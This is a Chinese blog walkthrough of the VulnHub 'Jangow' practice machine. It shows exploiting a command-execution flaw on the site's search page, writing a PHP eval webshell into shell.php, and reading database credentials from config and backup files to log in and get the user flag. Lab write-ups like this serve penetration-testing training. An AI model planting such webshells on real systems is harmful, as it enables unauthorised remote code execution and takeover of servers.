VulnHub JANGOW

提示(主机ip分配问题)

因为直接在VulnHub上下载的盒子,在VMware上打开,默认是不分配主机的

所以我们可以在VirtualBox上打开

一、信息收集

发现开放了21和80端口,查看一下80端口

80端口:

检查页面后发现Buscar页面有个可疑的地方:

试下,有命令执行

直接写入一句话木马试一下:

echo '<?php eval($_POST["sain"]);' > shell.php

利用命令执行,看到有shell.php,说明上传成功

连接成功。简单查看一下文件,在/var/www/html/site/wordpress下也发现了配置文件:

除此之外发现在/var/www/html下有一个./backup文件:

发现都是数据库的用户名和密码,但是jangow01和系统名字一样,所以我就尝试下直接登录系统,发现可以直接登陆进去:

username = "jangow01"password = "abygurl69"

拿到了user_flag

相关推荐
电鱼智能的电小鱼22 分钟前
EFISH-SBC-RK3588无人机地面基准站项目
linux·网络·嵌入式硬件·机器人·无人机·边缘计算
JM丫28 分钟前
PWNOS:2.0(vulnhub靶机)
网络安全
电鱼智能的电小鱼28 分钟前
基于 EFISH-SBC-RK3588 的无人机环境感知与数据采集方案
linux·网络·嵌入式硬件·数码相机·无人机·边缘计算
坐吃山猪42 分钟前
Python-Agent调用多个Server-FastAPI版本
开发语言·python·fastapi
Bruce-li__1 小时前
使用Django REST Framework快速开发API接口
python·django·sqlite
小兜全糖(xdqt)1 小时前
python 脚本引用django中的数据库model
python·django
小诸葛的博客1 小时前
详解Linux中的定时任务管理工具crond
linux·运维·chrome
一默19911 小时前
CentOS 7.9升级OpenSSH到9.9p2
linux·运维·centos
Arenaschi1 小时前
SQLite 是什么?
开发语言·网络·python·网络协议·tcp/ip
纪元A梦1 小时前
华为OD机试真题——推荐多样性(2025A卷:200分)Java/python/JavaScript/C++/C语言/GO六种最佳实现
java·javascript·c++·python·华为od·go·华为od机试题